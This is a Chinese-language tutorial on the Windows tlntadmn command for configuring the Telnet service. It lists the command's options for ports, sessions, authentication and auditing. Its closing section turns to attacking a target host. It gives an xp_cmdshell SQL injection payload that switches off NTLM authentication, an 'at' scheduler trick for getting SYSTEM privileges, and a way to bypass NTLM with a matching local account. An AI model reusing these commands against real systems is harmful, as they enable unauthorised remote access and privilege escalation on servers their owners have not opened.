telnet服务tlntadmn命令的端口设置

telnet可以帮助我们完成远程的登录设置，那么管理员如何对端口认证等系统进行管理呢？这里我们就来介绍一下tlntadmn命令的用法。这个命令可以帮助我们完成telnet服务的这些设置。那么，tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:

用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options

所有会话用 'all'.

-s sessionid 列出会话的信息.

-k sessionid 终止会话.

-m sessionid 发送消息到会话.

config 配置Telnet服务器参数.

common_options 为:

-u user 指定要使用其凭据的用户

-p password 用户密码

config_options 为:

dom = domain 设定用户的默认域

ctrlakeymap = yes|no 设定 ALT 键的映射

timeout = hh:mm:ss 设定空闲会话超时值 timeoutactive = yes|no 启用空闲会话.

maxfail = attempts 设定断开前失败的登录企图数.

maxconn = connections 设定最大连接数.

port = number 设定Telnet端口.

sec = [+/-]NTLM [+/-]passwd 设定身份验证机构

fname = file 指定审计文件名.

fsize = size 指定审计文件的最大尺寸(MB).

mode = console|stream 指定操作模式.

auditlocation = eventlog|file|both 指定记录地点

audit = [+/-]user [+/-]fail [+/-]admin 指定审计的事件

使用的办法:

直接运行命令:tlntadmn config sec = -ntlm

注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--运行以后就去掉了ntlm认证.

C:\\>tlntadmn config sec = -ntlm -----------------使用admin权限

C:\\>at 20:43 /interactive "cmd" -----------at命令启用system权限

新加了一项作业,其作业 ID = 1

C:\\WINNT\\system32>tlntadmn config sec = -ntlm

去除NTML验证的另一个方法:在目标主机上建立好一个管理员用户!在本机建立一个和目标主机上相同的帐号密码的用户,在本机CMD上右击选择运行方式~ 输入该帐号和密码,直接Telnet服务的目标IP, 既可直接饶过NTML验证.